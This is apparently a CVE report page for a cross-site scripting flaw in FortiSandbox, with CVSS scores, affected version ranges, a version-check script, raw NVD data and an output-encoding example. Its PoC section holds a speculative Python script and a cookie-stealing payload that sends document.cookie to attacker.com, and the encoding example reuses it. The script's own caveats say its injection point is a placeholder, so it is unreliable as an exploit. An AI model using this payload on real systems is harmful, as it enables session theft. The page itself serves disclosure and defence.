Security Vulnerability Report
CVE-2025-54353 CVSS 5.4 MEDIUM (Fortinet PSIRT) / 6.1 MEDIUM (NVD)

CVE-2025-54353

Published: 2025-12-09 18:15:54
Last Modified: 2025-12-09 20:10:24

Description

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, and FortiSandbox 4.0 all versions may allow an attacker to perform an XSS attack via crafted HTTP requests. The description does not name the affected endpoint or parameter; the only reference in the record is the vendor advisory FG-IR-25-477.

CVSS Details

Two CVSS v3.1 base scores are recorded for this CVE (see Raw JSON Data below); the vectors are identical except for the Scope metric.

CVSS Score (Fortinet PSIRT, CNA, Secondary)
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVSS Score (NVD, Primary)
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Reading the vector: network-reachable (AV:N), low complexity (AC:L), no privileges required (PR:N) and user interaction required (UI:R), i.e. a victim has to load the attacker's crafted request, which is the usual profile of a reflected XSS delivered by link. NVD sets Scope to Changed because the injected script runs in the victim's browser rather than in the appliance component that failed to encode the input, and that single metric lifts the score from 5.4 to 6.1.

Configurations (Affected Products)

NVD CPE match criteria (all on cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*, vulnerable):
versionStartIncluding 4.0.0, versionEndIncluding 4.0.6
versionStartIncluding 4.2.0, versionEndIncluding 4.2.8
versionStartIncluding 4.4.0, versionEndIncluding 4.4.7
versionStartIncluding 5.0.0, versionEndIncluding 5.0.2

Affected versions per the advisory text:
FortiSandbox 4.0 all versions
FortiSandbox 4.2 all versions
FortiSandbox 4.4.0 - 4.4.7
FortiSandbox 5.0.0 - 5.0.2

Note: the CPE upper bounds 4.0.6 and 4.2.8 are the builds NVD matched at analysis time on branches the description marks "all versions"; no fixed release is listed for 4.0 or 4.2, so treat any 4.0.x or 4.2.x build as affected. On the 4.4 and 5.0 branches the first builds outside the affected ranges are 4.4.8 and 5.0.3.
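As an added example (not part of this report's source data and not a Fortinet tool), the following Python check maps a FortiSandbox version string onto the affected ranges listed above. It treats the 4.0 and 4.2 branches as "all versions", following the description text rather than the CPE upper bounds, and reports a branch that is absent from the list as "not listed" rather than as safe. The accepted version syntax (optional leading "v", major.minor.patch, optional trailing build token) is an assumption made for this example, not FortiSandbox's documented format.

```python
"""Version check for CVE-2025-54353 (added example). Maps a FortiSandbox version string onto
the affected ranges from the advisory text and the NVD CPE data for this CVE."""
import re

# (branch, versionStartIncluding, versionEndIncluding). None means "all versions" on that
# branch, as the description states for 4.0 and 4.2; the CPE bounds 4.0.6 / 4.2.8 are the
# builds NVD matched at analysis time, not fixed releases, so they are deliberately not limits.
AFFECTED_RANGES = [
    ("4.0", "4.0.0", None),
    ("4.2", "4.2.0", None),
    ("4.4", "4.4.0", "4.4.7"),
    ("5.0", "5.0.0", "5.0.2"),
]

# Assumption: version strings begin with major.minor.patch, optionally prefixed with "v"
# and followed by a build token (e.g. "v5.0.2 build0123"). This is what the example
# accepts, not FortiSandbox's documented version format.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def parse_version(text: str) -> tuple:
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(g) for g in m.groups())


def is_affected(version: str) -> tuple:
    """Return (affected, reason). Only the major.minor branches listed in the advisory are
    evaluated; anything else is reported as not listed rather than as safe."""
    v = parse_version(version)
    for branch, start, end in AFFECTED_RANGES:
        lo = parse_version(start)
        if v[:2] != lo[:2]:
            continue  # different major.minor branch
        if end is None:
            return True, f"{branch}.x: all versions affected, no fixed release listed"
        hi = parse_version(end)
        if lo <= v <= hi:
            return True, f"{branch}.x: {start} through {end} affected"
        return False, f"{branch}.x: later than {end}, outside the affected range"
    return False, f"{v[0]}.{v[1]}.x: branch not listed as affected for CVE-2025-54353"


if __name__ == "__main__":
    # Constructed sample inputs covering each branch and both sides of the upper bounds.
    for s in ("v4.0.6 build0123", "4.2.9", "4.4.7", "4.4.8", "5.0.2", "5.0.3", "5.1.0"):
        affected, why = is_affected(s)
        print(f"{s:<18} {'AFFECTED' if affected else 'not affected':<13} {why}")
```

Feed it the version string from the appliance's system information page or from an asset inventory export; the reason string is meant to be copied into a ticket as-is.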

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-54353 PoC - FortiSandbox XSS
# Target: FortiSandbox 4.0 and 4.2 (all versions), 4.4.0-4.4.7, 5.0.0-5.0.2
#
# Caveats: the advisory text names no endpoint or parameter. The /jsonrpc path, the
# "submit-analysis" method and the "comment" field below are placeholders, not documented
# injection points. The published vector (PR:N/UI:R) describes an unauthenticated attacker
# and a victim who must act, i.e. the usual profile of a reflected XSS delivered by link;
# this script instead posts an authenticated request, which does not match that vector.

TARGET_URL = "https://<fortisandbox-ip>/jsonrpc"

# XSS payload - cookie stealing example
xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'


def exploit_xss():
    """
    Inject XSS payload into FortiSandbox via crafted HTTP request.
    The vulnerable parameter may vary - common targets include:
    - job comments/descriptions
    - analysis submission notes
    - report titles
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <session-token>",
    }
    # Example JSON-RPC request structure (placeholder method and field names)
    payload = {
        "method": "submit-analysis",
        "params": {
            "url": "http://malicious-site.com",
            "comment": xss_payload,  # XSS injection point
        },
        "jsonrpc": "2.0",
    }
    try:
        response = requests.post(
            TARGET_URL,
            json=payload,
            headers=headers,
            verify=False,  # appliance certificates are commonly self-signed
            timeout=10,
        )
        print(f"Response: {response.status_code}")
        # The appliance may answer with a non-JSON body (login page, HTML error); do not crash on it.
        try:
            return response.json()
        except ValueError:
            return response.text
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-54353 PoC - FortiSandbox XSS")
    exploit_xss()
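Independent of the PoC above, and added here as an illustration rather than code from FortiSandbox or the advisory, the following Python snippet shows the CWE-79 pattern in miniature: a user-supplied comment concatenated into HTML as-is, beside the same value rendered with output encoding for the three contexts it typically lands in (HTML text, a quoted attribute, and a JavaScript string). The render functions are hypothetical; the inputs are constructed for this example, the first being the cookie-stealing payload reused from the PoC.

```python
"""CWE-79 in miniature (added example): the same user-supplied comment rendered without and
with context-appropriate output encoding. Not FortiSandbox code."""
import html
import json
import re

# Constructed input: the cookie-stealing payload from the PoC above.
PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
# Constructed input: breaks out of a quoted attribute instead of opening a tag.
ATTR_PAYLOAD = '" onfocus="alert(document.domain)" autofocus="'

_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_comment_vulnerable(comment: str) -> str:
    """Raw concatenation: user input becomes markup. This is the CWE-79 pattern."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_hardened(comment: str) -> str:
    """HTML text context: entity-encode <, >, & and, with quote=True, also " and '."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def render_title_attribute(title: str) -> str:
    """Attribute context: the value is quoted, so the quote characters must be encoded
    or the input can close the attribute and add an event handler."""
    return f'<input type="text" name="title" value="{html.escape(title, quote=True)}">'


def js_string_literal(value: str) -> str:
    """JavaScript context: html.escape is the wrong tool here, the browser does not
    HTML-decode a script body. JSON-encode the value and break every '</' so the text
    '</script>' can never terminate the enclosing block ('\\/' is a valid JSON escape)."""
    return json.dumps(value).replace("</", "<\\/")


def embed_in_script(value: str) -> str:
    return f"<script>var comment = {js_string_literal(value)};</script>"


def contains_script_tag(rendered: str) -> bool:
    """Crude detector used only to make the difference visible in this example."""
    return _SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    print("vulnerable:", render_comment_vulnerable(PAYLOAD))
    print("hardened:  ", render_comment_hardened(PAYLOAD))
    print("attribute: ", render_title_attribute(ATTR_PAYLOAD))
    print("script:    ", embed_in_script(PAYLOAD))
```

The point of the three encoders is that the correct neutralization depends on where the value is written; applying HTML entity encoding everywhere leaves the script context open, and skipping quote=True leaves the attribute context open. A Content-Security-Policy that disallows inline script is worth adding as defense in depth, but it does not replace output encoding.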

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-477 (Vendor Advisory FG-IR-25-477; the only reference in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-54353",
    "sourceIdentifier": "psirt@fortinet.com",
    "published": "2025-12-09T18:15:53.973",
    "lastModified": "2025-12-09T20:10:23.677",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an attacker to perform an XSS attack via crafted HTTP requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "psirt@fortinet.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        },
        {
          "source": "nvd@nist.gov",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "psirt@fortinet.com",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndIncluding": "4.0.6", "matchCriteriaId": "6AD9ECD5-FE5A-4772-A53A-04769828A110"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndIncluding": "4.2.8", "matchCriteriaId": "814D77BE-F536-42DE-B068-F92B95D68248"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndIncluding": "4.4.7", "matchCriteriaId": "08D2984D-3F90-42A6-9DC9-5E853E7B3188"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndIncluding": "5.0.2", "matchCriteriaId": "C5335FAF-6569-44CE-8634-0991C738CCF9"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-477", "source": "psirt@fortinet.com", "tags": ["Vendor Advisory"]}
    ]
  }
}